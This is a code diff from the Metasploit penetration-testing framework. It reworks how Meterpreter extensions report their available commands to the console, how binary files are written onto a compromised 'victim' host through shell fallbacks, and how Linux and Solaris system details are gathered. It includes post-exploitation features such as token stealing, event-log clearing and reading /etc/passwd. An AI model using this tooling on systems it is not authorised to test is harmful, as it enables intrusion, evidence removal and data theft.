@@ -322,7 +322,7 @@ public void writeRequestPacket(String method, TLVPacket tlv) throws IOException
* @param data
* The extension jar's content as a byte array
*/
- public void loadExtension(byte[] data) throws Exception {
+ public String[] loadExtension(byte[] data) throws Exception {
ClassLoader classLoader = getClass().getClassLoader();
if (loadExtensions) {
URL url = MemoryBufferURLConnection.createURL(data, "application/jar");
@@ -331,6 +331,8 @@ public void loadExtension(byte[] data) throws Exception {
JarInputStream jis = new JarInputStream(new ByteArrayInputStream(data));
String loaderName = (String) jis.getManifest().getMainAttributes().getValue("Extension-Loader");
ExtensionLoader loader = (ExtensionLoader) classLoader.loadClass(loaderName).newInstance();
+ commandManager.resetNewCommands();
loader.load(commandManager);
+ return commandManager.getNewCommands();
}
-}
+}
View
8 ...source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/core/core_loadlib.java
@@ -9,7 +9,11 @@
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
byte[] data = request.getRawValue(TLVType.TLV_TYPE_DATA);
- meterpreter.loadExtension(data);
+ String[] commands = meterpreter.loadExtension(data);
+ for (int i = 0; i < commands.length; i++) {
+ response.addOverflow(TLVType.TLV_TYPE_METHOD, commands[i]);
+ }
+
return ERROR_SUCCESS;
}
-}
+}
View
18 external/source/meterpreter/source/common/base.c
@@ -116,7 +116,7 @@ Command commands[] =
};
// Dynamically registered command extensions
-Command *extensionList = NULL;
+Command *extension_commands = NULL;
/*
* Dynamically register a custom command handler
@@ -133,13 +133,13 @@ DWORD command_register(Command *command)
memcpy(newCommand, command, sizeof(Command));
dprintf("Setting new command...");
- if (extensionList)
- extensionList->prev = newCommand;
+ if (extension_commands)
+ extension_commands->prev = newCommand;
dprintf("Fixing next/prev...");
- newCommand->next = extensionList;
+ newCommand->next = extension_commands;
newCommand->prev = NULL;
- extensionList = newCommand;
+ extension_commands = newCommand;
dprintf("Done...");
return ERROR_SUCCESS;
@@ -154,7 +154,7 @@ DWORD command_deregister(Command *command)
DWORD res = ERROR_NOT_FOUND;
// Search the extension list for the command
- for (current = extensionList, prev = NULL;
+ for (current = extension_commands, prev = NULL;
current;
prev = current, current = current->next)
{
@@ -164,7 +164,7 @@ DWORD command_deregister(Command *command)
if (prev)
prev->next = current->next;
else
- extensionList = current->next;
+ extension_commands = current->next;
if (current->next)
current->next->prev = prev;
@@ -288,7 +288,7 @@ DWORD THREADCALL command_process_thread( THREAD * thread )
}
// Regardless of error code, try to see if someone has overriden a base handler
- for( current = extensionList, result = ERROR_NOT_FOUND ;
+ for( current = extension_commands, result = ERROR_NOT_FOUND ;
result == ERROR_NOT_FOUND && current && current->method ; current = current->next )
{
if( strcmp( current->method, method ) )
@@ -373,7 +373,7 @@ DWORD command_process_remote(Remote *remote, Packet *inPacket)
// Regardless of error code, try to see if someone has overriden
// a base handler
- for (current = extensionList, res = ERROR_NOT_FOUND;
+ for (current = extension_commands, res = ERROR_NOT_FOUND;
res == ERROR_NOT_FOUND && current && current->method;
current = current->next)
{
View
6 external/source/meterpreter/source/extensions/stdapi/server/net/config/interface.c
@@ -314,9 +314,9 @@ int get_interfaces_linux(Remote *remote, Packet *response) {
tlv_cnt++;
for (j = 0; j < ifaces->ifaces[i].addr_count; j++) {
- if (allocd_entries < tlv_cnt+3) {
- entries = realloc(entries, sizeof(Tlv) * (tlv_cnt+3));
- allocd_entries += 3;
+ if (allocd_entries < tlv_cnt+2) {
+ entries = realloc(entries, sizeof(Tlv) * (tlv_cnt+2));
+ allocd_entries += 2;
}
if (ifaces->ifaces[i].addr_list[j].family == AF_INET) {
dprintf("ip addr for %s", ifaces->ifaces[i].name);
View
2  external/source/meterpreter/source/extensions/stdapi/server/stdapi.c
@@ -296,6 +296,7 @@ Command customCommands[] =
{ request_sys_config_getprivs, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
+#ifdef _WIN32
{ "stdapi_sys_config_steal_token",
{ request_sys_config_steal_token, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
@@ -304,6 +305,7 @@ Command customCommands[] =
{ request_sys_config_drop_token, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
+#endif
// Net
View
10 external/source/meterpreter/source/server/posix/remote_dispatch.c
@@ -1,6 +1,7 @@
#include <dlfcn.h>
#include "metsrv.h"
+extern Command *extension_commands;
DWORD
request_core_loadlib(Remote *remote, Packet *packet)
@@ -12,7 +13,9 @@ request_core_loadlib(Remote *remote, Packet *packet)
DWORD flags = 0;
PCHAR targetPath;
int local_error = 0;
-
+ Command *command;
+ Command *first = extension_commands;
+
do
{
Tlv dataTlv;
@@ -64,6 +67,11 @@ request_core_loadlib(Remote *remote, Packet *packet)
dprintf("calling InitServerExtension");
res = init(remote);
}
+ if (response) {
+ for (command = extension_commands; command != first; command = command->next) {
+ packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
+ }
+ }
}
} while (0);
View
10 external/source/meterpreter/source/server/win/remote_dispatch.c
@@ -5,6 +5,8 @@ extern HINSTANCE hAppInstance;
// see remote_dispatch_common.c
extern LIST * extension_list;
+// see common/base.c
+extern Command *extension_commands;
DWORD request_core_loadlib(Remote *remote, Packet *packet)
{
@@ -15,6 +17,9 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
DWORD flags = 0;
BOOL bLibLoadedReflectivly = FALSE;
+ Command *first = extension_commands;
+ Command *command;
+
do
{
libraryPath = packet_get_tlv_value_string(packet,
@@ -124,6 +129,11 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
free( extension );
}
dprintf("[SERVER] Called init()...");
+ if (response) {
+ for (command = extension_commands; command != first; command = command->next) {
+ packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
+ }
+ }
}
}
View
116 lib/msf/core/post/file.rb
@@ -212,7 +212,7 @@ def _read_file_meterpreter(file_name)
return nil
end
- data = ''
+ data = fd.read
begin
until fd.eof?
data << fd.read
@@ -247,77 +247,83 @@ def _write_file_unix_shell(file_name, data, append=false)
chunks = []
command = nil
+ encoding = :hex
line_max = _unix_max_line_length
# Leave plenty of room for the filename we're writing to and the
# command to echo it out
line_max -= file_name.length - 64
- # Default to simple echo. If the data is binary, though, we have to do
- # something fancy
- if d =~ /[^[:print:]]/
- # Ordered by descending likeliness to work
- [
- %q^perl -e 'print("\x41")'^,
- # POSIX awk doesn't have \xNN escapes, use gawk to ensure we're
- # getting the GNU version.
- %q^gawk 'BEGIN {ORS = ""; print "\x41"}' </dev/null^,
- # bash and zsh's echo builtins are apparently the only ones
- # that support both -e and -n as we need them. Most others
- # treat all options as just more arguments to print. In
- # particular, the standalone /bin/echo or /usr/bin/echo appear
- # never to have -e so don't bother trying them.
- %q^echo -ne '\x41'^,
- # printf seems to have different behavior on bash vs sh vs
- # other shells, try a full path (and hope it's the actual path)
- %q^/usr/bin/printf '\x41'^,
- %q^printf '\x41'^,
- ].each { |c|
- a = session.shell_command_token("#{c}")
- if "A" == a
- command = c
- break
- #else
- # p a
- end
- }
-
- if command.nil?
- raise RuntimeError, "Can't find command on the victim for writing binary data", caller
+ # Ordered by descending likeliness to work
+ [
+ # POSIX standard requires %b which expands octal (but not hex)
+ # escapes in the argument. However, some versions truncate input on
+ # nulls, so "printf %b '\0\101'" produces a 0-length string. The
+ # standalon version seems to be more likely to work than the buitin
+ # version, so try it first
+ { :cmd => %q^/usr/bin/printf %b 'CONTENTS'^ , :enc => :octal },
+ { :cmd => %q^printf %b 'CONTENTS'^ , :enc => :octal },
+ # Perl supports both octal and hex escapes, but octal is usually
+ # shorter (e.g. 0 becomes \0 instead of \x00)
+ { :cmd => %q^perl -e 'print("CONTENTS")'^ , :enc => :octal },
+ # POSIX awk doesn't have \xNN escapes, use gawk to ensure we're
+ # getting the GNU version.
+ { :cmd => %q^gawk 'BEGIN {ORS = ""; print "CONTENTS"}' </dev/null^ , :enc => :hex },
+ # Use echo as a last resort since it frequently doesn't support -e
+ # or -n. bash and zsh's echo builtins are apparently the only ones
+ # that support both. Most others treat all options as just more
+ # arguments to print. In particular, the standalone /bin/echo or
+ # /usr/bin/echo appear never to have -e so don't bother trying
+ # them.
+ { :cmd => %q^echo -ne 'CONTENTS'^ , :enc => :hex },
+ ].each { |foo|
+ # Some versions of printf mangle %.
+ test_str = "\0\xff\xfeABCD\x7f%%\r\n"
+ if foo[:enc] == :hex
+ cmd = foo[:cmd].sub("CONTENTS"){ Rex::Text.to_hex(test_str) }
+ else
+ cmd = foo[:cmd].sub("CONTENTS"){ Rex::Text.to_octal(test_str) }
+ end
+ a = session.shell_command_token("#{cmd}")
+ if test_str == a
+ command = foo[:cmd]
+ encoding = foo[:enc]
+ break
+ else
+ p a
end
+ }
+
+ if command.nil?
+ raise RuntimeError, "Can't find command on the victim for writing binary data", caller
+ end
- # each byte will balloon up to 4 when we hex encode
- max = line_max/4
- i = 0
- while (i < d.length)
+ # each byte will balloon up to 4 when we encode
+ # (A becomes \x41 or \101)
+ max = line_max/4
+
+ i = 0
+ while (i < d.length)
+ if encoding == :hex
chunks << Rex::Text.to_hex(d.slice(i...(i+max)))
- i += max
- end
- else
- i = 0
- while (i < d.length)
- chunk = d.slice(i...(i+line_max))
- # POSIX standard says single quotes cannot appear inside single
- # quotes and can't be escaped. Replace them with an equivalent.
- # (Close single quotes, open double quotes containing a single
- # quote, re-open single qutoes)
- chunk.gsub!("'", %q|'"'"'|)
- chunks << chunk
- i += line_max
+ else
+ chunks << Rex::Text.to_octal(d.slice(i...(i+max)))
end
- command = "echo -n '\\x41'"
+ i += max
end
- vprint_status("Writing #{d.length} bytes in #{chunks.length} chunks, using #{command.split(" ",2).first}")
+
+ vprint_status("Writing #{d.length} bytes in #{chunks.length} chunks of #{chunks.first.length} bytes (#{encoding}-encoded), using #{command.split(" ",2).first}")
# The first command needs to use the provided redirection for either
# appending or truncating.
- cmd = command.sub("\\x41", chunks.shift)
+ cmd = command.sub("CONTENTS") { chunks.shift }
session.shell_command_token("#{cmd} #{redirect} '#{file_name}'")
# After creating/truncating or appending with the first command, we
# need to append from here on out.
chunks.each { |chunk|
- cmd = command.sub("\\x41", chunk)
+ vprint_status("Next chunk is #{chunk.length} bytes")
+ cmd = command.sub("CONTENTS") { chunk }
session.shell_command_token("#{cmd} >> '#{file_name}'")
}
@@ -336,7 +342,11 @@ def _unix_max_line_length
i=`expr $i + 1`; str=$str$str;\
done; echo $max'
line_max = session.shell_command_token(calc_line_max).to_i
+
+ # Fall back to a conservative 4k which should work on even the most
+ # restrictive of embedded shells.
line_max = (line_max == 0 ? 4096 : line_max)
+ vprint_status("Max line length is #{line_max}")
line_max
end
View
203 lib/msf/core/post/linux/system.rb
@@ -6,145 +6,92 @@ class Post
module Linux
module System
include ::Msf::Post::Common
- include ::Msf::Post::File
-
- # Returns a Hash containing Distribution Name, Version and Kernel Information
- def get_sysinfo
- system_data = {}
- etc_files = cmd_exec("ls /etc").split()
-
- # Debian
- if etc_files.include?("debian_version")
- kernel_version = cmd_exec("uname -a")
- if kernel_version =~ /Ubuntu/
- version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "ubuntu"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
- else
- version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "debian"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
- end
-
- # Amazon
- elsif etc_files.include?("system-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/system-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "amazon"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
-
- # Fedora
- elsif etc_files.include?("fedora-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/fedora-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "fedora"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
-
- # Oracle Linux
- elsif etc_files.include?("enterprise-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/enterprise-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "oracle"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
+ include ::Msf::Post::File
- # RedHat
- elsif etc_files.include?("redhat-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/redhat-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "redhat"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
+ include ::Msf::Post::Unix
- # Arch
- elsif etc_files.include?("arch-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/arch-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "arch"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
+ # Returns a Hash containing Distribution Name, Version and Kernel Information
+ def get_sysinfo
+ system_data = {}
+ etc_files = cmd_exec("ls /etc").split()
- # Slackware
- elsif etc_files.include?("slackware-version")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/slackware-version").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "slackware"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
-
- # Mandrake
- elsif etc_files.include?("mandrake-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/mandrake-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "mandrake"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
+ kernel_version = cmd_exec("uname -a")
+ system_data[:kernel] = kernel_version
- #SuSE
- elsif etc_files.include?("SuSE-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/SuSE-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "suse"
- system_data[:version] = version
- system_data[:kernel] = kernel_version
-
- # Gentoo
- elsif etc_files.include?("gentoo-release")
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/gentoo-release").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "gentoo"
+ # Debian
+ if etc_files.include?("debian_version")
+ if kernel_version =~ /Ubuntu/
+ version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "ubuntu"
system_data[:version] = version
- system_data[:kernel] = kernel_version
else
-
- # Others
- kernel_version = cmd_exec("uname -a")
version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
- system_data[:distro] = "linux"
+ system_data[:distro] = "debian"
system_data[:version] = version
- system_data[:kernel] = kernel_version
end
- return system_data
- end
- # Returns an array of hashes each representing a user
- # Keys are name, uid, gid, info, dir and shell
- def get_users
- users = []
- cmd_out = cmd_exec("cat /etc/passwd").split("\n")
- cmd_out.each do |l|
- entry = {}
- user_field = l.split(":")
- entry[:name] = user_field[0]
- entry[:uid] = user_field[2]
- entry[:gid] = user_field[3]
- entry[:info] = user_field[4]
- entry[:dir] = user_field[5]
- entry[:shell] = user_field[6]
- users << entry
- end
- return users
- end
-
- # Returns an array of hashes each hash representing a user group
- # Keys are name, gid and users
- def get_groups
- groups = []
- cmd_out = cmd_exec("cat /etc/group").split("\n")
- cmd_out.each do |l|
- entry = {}
- user_field = l.split(":")
- entry[:name] = user_field[0]
- entry[:gid] = user_field[2]
- entry[:users] = user_field[3]
- groups << entry
- end
- return groups
+ # Amazon
+ elsif etc_files.include?("system-release")
+ version = read_file("/etc/system-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "amazon"
+ system_data[:version] = version
+
+ # Fedora
+ elsif etc_files.include?("fedora-release")
+ version = read_file("/etc/fedora-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "fedora"
+ system_data[:version] = version
+
+ # Oracle Linux
+ elsif etc_files.include?("enterprise-release")
+ version = read_file("/etc/enterprise-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "oracle"
+ system_data[:version] = version
+
+ # RedHat
+ elsif etc_files.include?("redhat-release")
+ version = read_file("/etc/redhat-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "redhat"
+ system_data[:version] = version
+
+ # Arch
+ elsif etc_files.include?("arch-release")
+ version = read_file("/etc/arch-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "arch"
+ system_data[:version] = version
+
+ # Slackware
+ elsif etc_files.include?("slackware-version")
+ version = read_file("/etc/slackware-version").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "slackware"
+ system_data[:version] = version
+
+ # Mandrake
+ elsif etc_files.include?("mandrake-release")
+ version = read_file("/etc/mandrake-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "mandrake"
+ system_data[:version] = version
+
+ #SuSE
+ elsif etc_files.include?("SuSE-release")
+ version = read_file("/etc/SuSE-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "suse"
+ system_data[:version] = version
+
+ # Gentoo
+ elsif etc_files.include?("gentoo-release")
+ version = read_file("/etc/gentoo-release").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "gentoo"
+ system_data[:version] = version
+ else
+
+ # Others
+ version = read_file("/etc/issue").gsub(/\n|\\n|\\l/,'')
+ system_data[:distro] = "linux"
+ system_data[:version] = version
end
+ return system_data
+ end
end # System
View
62 lib/msf/core/post/solaris/system.rb
@@ -1,59 +1,29 @@
require 'msf/core/post/common'
require 'msf/core/post/file'
+require 'msf/core/post/unix'
module Msf
class Post
module Solaris
module System
include ::Msf::Post::Common
- include ::Msf::Post::File
+ include ::Msf::Post::File
- # Returns a Hash containing Distribution Name, Version and Kernel Information
- def get_sysinfo
- system_data = {}
- kernel_version = cmd_exec("uname -a")
- version = read_file("/etc/release").split("\n")[0].strip
- system_data[:version] = version
- system_data[:kernel] = kernel_version
- system_data[:hostname] = kernel_version.split(" ")[1]
- return system_data
- end
-
- # Returns an array of hashes each representing a user
- # Keys are name, uid, gid, info, dir and shell
- def get_users
- users = []
- cmd_out = cmd_exec("cat /etc/passwd").split("\n")
- cmd_out.each do |l|
- entry = {}
- user_field = l.split(":")
- entry[:name] = user_field[0]
- entry[:uid] = user_field[2]
- entry[:gid] = user_field[3]
- entry[:info] = user_field[4]
- entry[:dir] = user_field[5]
- entry[:shell] = user_field[6]
- users << entry
- end
- return users
- end
-
- # Returns an array of hashes each hash representing a user group
- # Keys are name, gid and users
- def get_groups
- groups = []
- cmd_out = cmd_exec("cat /etc/group").split("\n")
- cmd_out.each do |l|
- entry = {}
- user_field = l.split(":")
- entry[:name] = user_field[0]
- entry[:gid] = user_field[2]
- entry[:users] = user_field[3]
- groups << entry
- end
- return groups
- end
+ include ::Msf::Post::Unix
+ #
+ # Returns a Hash containing Distribution Name, Version and Kernel
+ # Information
+ #
+ def get_sysinfo
+ system_data = {}
+ kernel_version = cmd_exec("uname -a")
+ version = read_file("/etc/release").split("\n")[0].strip
+ system_data[:version] = version
+ system_data[:kernel] = kernel_version
+ system_data[:hostname] = kernel_version.split(" ")[1]
+ return system_data
+ end
end # System
end # Solaris
View
23 lib/rex/post/meterpreter/client.rb
@@ -104,6 +104,7 @@ def init_meterpreter(sock,opts={})
self.alive = true
self.target_id = opts[:target_id]
self.capabilities = opts[:capabilities] || {}
+ self.commands = []
self.conn_id = opts[:conn_id]
@@ -281,6 +282,7 @@ def Client.default_timeout
# if a matching extension alias exists for the supplied symbol.
#
def method_missing(symbol, *args)
+ #$stdout.puts("method_missing: #{symbol}")
self.ext_aliases.aliases[symbol.to_s]
end
@@ -294,7 +296,9 @@ def method_missing(symbol, *args)
# Loads the client half of the supplied extension and initializes it as a
# registered extension that can be reached through client.ext.[extension].
#
- def add_extension(name)
+ def add_extension(name, commands=[])
+ self.commands |= commands
+
# Check to see if this extension has already been loaded.
if ((klass = self.class.check_ext_hash(name.downcase)) == nil)
old = Rex::Post::Meterpreter::Extensions.constants
@@ -341,6 +345,18 @@ def each_extension(&block)
#
def register_extension_alias(name, ext)
self.ext_aliases.aliases[name] = ext
+ # Whee! Syntactic sugar, where art thou?
+ #
+ # Create an instance method on this object called +name+ that returns
+ # +ext+. We have to do it this way instead of simply
+ # self.class.class_eval so that other meterpreter sessions don't get
+ # extension methods when this one does
+ (class << self; self; end).class_eval do
+ define_method(name.to_sym) do
+ ext
+ end
+ end
+ ext
end
#
@@ -445,10 +461,15 @@ def unicode_filter_decode(str)
# Flag indicating whether to hex-encode UTF-8 file names and other strings
#
attr_accessor :encode_unicode
+ #
+ # A list of the commands
+ #
+ attr_reader :commands
protected
attr_accessor :parser, :ext_aliases # :nodoc:
attr_writer :ext, :sock # :nodoc:
+ attr_writer :commands # :nodoc:
end
end; end; end
View
14 lib/rex/post/meterpreter/client_core.rb
@@ -121,7 +121,12 @@ def load_library(opts)
raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
end
- return true
+ commands = []
+ response.each(TLV_TYPE_METHOD) { |c|
+ commands << c.value
+ }
+
+ return commands
end
#
@@ -150,13 +155,12 @@ def use(mod, opts = { })
path = ::File.expand_path(path)
# Load the extension DLL
- if (load_library(
+ commands = load_library(
'LibraryFilePath' => path,
'UploadLibrary' => true,
'Extension' => true,
- 'SaveToDisk' => opts['LoadFromDisk']))
- client.add_extension(mod)
- end
+ 'SaveToDisk' => opts['LoadFromDisk'])
+ client.add_extension(mod, commands)
return true
end
View
20 lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb
@@ -22,7 +22,7 @@ def initialize(client)
client.register_extension_aliases(
[
- {
+ {
'name' => 'sniffer',
'ext' => self
},
@@ -42,19 +42,19 @@ def interfaces()
ikeys = %W{idx name description type mtu wireless usable dhcp}
ikeys.each_index { |i| iface[ikeys[i]] = vals[i] }
ifaces << iface
- }
+ }
return ifaces
end
-
+
# Start a packet capture on an opened interface
def capture_start(intf,maxp=200000,filter="")
request = Packet.create_request('sniffer_capture_start')
request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
request.add_tlv(TLV_TYPE_SNIFFER_PACKET_COUNT, maxp.to_i)
request.add_tlv(TLV_TYPE_SNIFFER_ADDITIONAL_FILTER, filter) if filter.length > 0
- response = client.send_request(request)
+ response = client.send_request(request)
end
-
+
# Stop an active packet capture
def capture_stop(intf)
request = Packet.create_request('sniffer_capture_stop')
@@ -65,7 +65,7 @@ def capture_stop(intf)
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
}
end
-
+
# Retrieve stats about a current capture
def capture_stats(intf)
request = Packet.create_request('sniffer_capture_stats')
@@ -87,7 +87,7 @@ def capture_release(intf)
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
}
end
-
+
# Buffer the current capture to a readable buffer
def capture_dump(intf)
request = Packet.create_request('sniffer_capture_dump')
@@ -99,19 +99,19 @@ def capture_dump(intf)
:linktype => response.get_tlv_value(TLV_TYPE_SNIFFER_INTERFACE_ID),
}
end
-
+
# Retrieve the packet data for the specified capture
def capture_dump_read(intf, len=16384)
request = Packet.create_request('sniffer_capture_dump_read')
request.add_tlv(TLV_TYPE_SNIFFER_INTERFACE_ID, intf.to_i)
- request.add_tlv(TLV_TYPE_SNIFFER_BYTE_COUNT, len.to_i)
+ request.add_tlv(TLV_TYPE_SNIFFER_BYTE_COUNT, len.to_i)
response = client.send_request(request, 3600)
{
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
:data => response.get_tlv_value(TLV_TYPE_SNIFFER_PACKET)
}
end
-
+
end
end; end; end; end; end
View
10 lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -43,11 +43,9 @@ def commands
"close" => "Closes a channel",
"channel" => "Displays information about active channels",
"exit" => "Terminate the meterpreter session",
- "detach" => "Detach the meterpreter session (for http/https)",
"help" => "Help menu",
"interact" => "Interacts with a channel",
"irb" => "Drop into irb scripting mode",
- "migrate" => "Migrate the server to another process",
"use" => "Deprecated alias for 'load'",
"load" => "Load one or more meterpreter extensions",
"quit" => "Terminate the meterpreter session",
@@ -61,6 +59,14 @@ def commands
"enable_unicode_encoding" => "Enables encoding of unicode strings",
"disable_unicode_encoding" => "Disables encoding of unicode strings"
}
+
+ if client.passive_service
+ c["detach"] = "Detach the meterpreter session (for http/https)"
+ end
+ if client.commands.include? "core_migrate"
+ c["migrate"] = "Migrate the server to another process"
+ end
+
if (msf_loaded?)
c["info"] = "Displays information about a Post module"
end
View
72 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
@@ -34,24 +34,56 @@ class Console::CommandDispatcher::Stdapi::Fs
# List of supported commands.
#
def commands
- {
+ all = {
"cat" => "Read the contents of a file to the screen",
"cd" => "Change directory",
+ "del" => "Delete the specified file",
"download" => "Download a file or directory",
"edit" => "Edit a file",
+ "getlwd" => "Print local working directory",
"getwd" => "Print working directory",
+ "lcd" => "Change local working directory",
+ "lpwd" => "Print local working directory",
"ls" => "List files",
"mkdir" => "Make directory",
"pwd" => "Print working directory",
+ "rm" => "Delete the specified file",
"rmdir" => "Remove directory",
+ "search" => "Search for files",
"upload" => "Upload a file or directory",
- "lcd" => "Change local working directory",
- "getlwd" => "Print local working directory",
- "lpwd" => "Print local working directory",
- "rm" => "Delete the specified file",
- "del" => "Delete the specified file",
- "search" => "Search for files"
}
+
+ reqs = {
+ "cat" => [ ],
+ "cd" => [ "stdapi_fs_chdir" ],
+ "del" => [ "stdapi_fs_rm" ],
+ "download" => [ ],
+ "edit" => [ ],
+ "getlwd" => [ ],
+ "getwd" => [ "stdapi_fs_getwd" ],
+ "lcd" => [ ],
+ "lpwd" => [ ],
+ "ls" => [ "stdapi_fs_stat", "stdapi_fs_ls" ],
+ "mkdir" => [ "stdapi_fs_mkdir" ],
+ "pwd" => [ "stdapi_fs_getwd" ],
+ "rmdir" => [ "stdapi_fs_delete_dir" ],
+ "rm" => [ "stdapi_fs_rm" ],
+ "search" => [ "stdapi_fs_search" ],
+ "upload" => [ ],
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
+
+ all
end
#
@@ -65,18 +97,18 @@ def name
# Search for files.
#
def cmd_search( *args )
-
+
root = nil
glob = nil
recurse = true
-
+
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner." ],
"-d" => [ true, "The directory/drive to begin searching from. Leave empty to search all drives. (Default: #{root})" ],
"-f" => [ true, "The file pattern glob to search for. (e.g. *secret*.doc?)" ],
"-r" => [ true, "Recursivly search sub directories. (Default: #{recurse})" ]
)
-
+
opts.parse(args) { | opt, idx, val |
case opt
when "-h"
@@ -92,14 +124,14 @@ def cmd_search( *args )
recurse = false if( val =~ /^(f|n|0)/i )
end
}
-
+
if( not glob )
print_error( "You must specify a valid file glob to search for, e.g. >search -f *.doc" )
return
end
-
+
files = client.fs.file.search( root, glob, recurse )
-
+
if( not files.empty? )
print_line( "Found #{files.length} result#{ files.length > 1 ? 's' : '' }..." )
files.each do | file |
@@ -112,9 +144,9 @@ def cmd_search( *args )
else
print_line( "No files matching your search were found." )
end
-
+
end
-
+
#
# Reads the contents of a file and prints them to the screen.
#
@@ -169,7 +201,7 @@ def cmd_lcd(*args)
return true
end
-
+
#
# Delete the specified file.
#
@@ -183,7 +215,7 @@ def cmd_rm(*args)
return true
end
-
+
alias :cmd_del :cmd_rm
def cmd_download_help
@@ -192,7 +224,7 @@ def cmd_download_help
print_line "Downloads remote files and directories to the local machine."
print_line @@download_opts.usage
end
-
+
#
# Downloads a file or directory from the remote machine to the local
# machine.
@@ -250,7 +282,7 @@ def cmd_download(*args)
}
end
}
-
+
return true
end
@@ -454,7 +486,7 @@ def cmd_upload(*args)
}
end
}
-
+
return true
end
View
29 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
@@ -54,12 +54,39 @@ def cleanup
# List of supported commands.
#
def commands
- {
+ all = {
"ipconfig" => "Display interfaces",
"ifconfig" => "Display interfaces",
"route" => "View and modify the routing table",
"portfwd" => "Forward a local port to a remote service",
}
+ reqs = {
+ "ipconfig" => [ "stdapi_net_config_get_interfaces" ],
+ "ifconfig" => [ "stdapi_net_config_get_interfaces" ],
+ "route" => [
+ # Also uses these, but we don't want to be unable to list them
+ # just because we can't alter them.
+ #"stdapi_net_config_add_route",
+ #"stdapi_net_config_remove_route",
+ "stdapi_net_config_get_routes"
+ ],
+ # Only creates tcp channels, which is something whose availability
+ # we can't check directly at the moment.
+ "portfwd" => [ ],
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
+
+ all
end
#
View
74 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -48,23 +48,67 @@ class Console::CommandDispatcher::Stdapi::Sys
# List of supported commands.
#
def commands
- {
- "clearev" => "Clear the event log",
- "execute" => "Execute a command",
- "getpid" => "Get the current process identifier",
- "getuid" => "Get the user that the server is running as",
- "getprivs" => "Attempt to enable all privileges available to the current process",
- "kill" => "Terminate a process",
- "ps" => "List running processes",
- "reboot" => "Reboots the remote computer",
- "reg" => "Modify and interact with the remote registry",
- "rev2self" => "Calls RevertToSelf() on the remote machine",
- "sysinfo" => "Gets information about the remote system, such as OS",
- "shell" => "Drop into a system command shell",
- "shutdown" => "Shuts down the remote computer",
- "steal_token" => "Attempts to steal an impersonation token from the target process",
+ all = {
+ "clearev" => "Clear the event log",
"drop_token" => "Relinquishes any active impersonation token.",
+ "execute" => "Execute a command",
+ "getpid" => "Get the current process identifier",
+ "getprivs" => "Attempt to enable all privileges available to the current process",
+ "getuid" => "Get the user that the server is running as",
+ "kill" => "Terminate a process",
+ "ps" => "List running processes",
+ "reboot" => "Reboots the remote computer",
+ "reg" => "Modify and interact with the remote registry",
+ "rev2self" => "Calls RevertToSelf() on the remote machine",
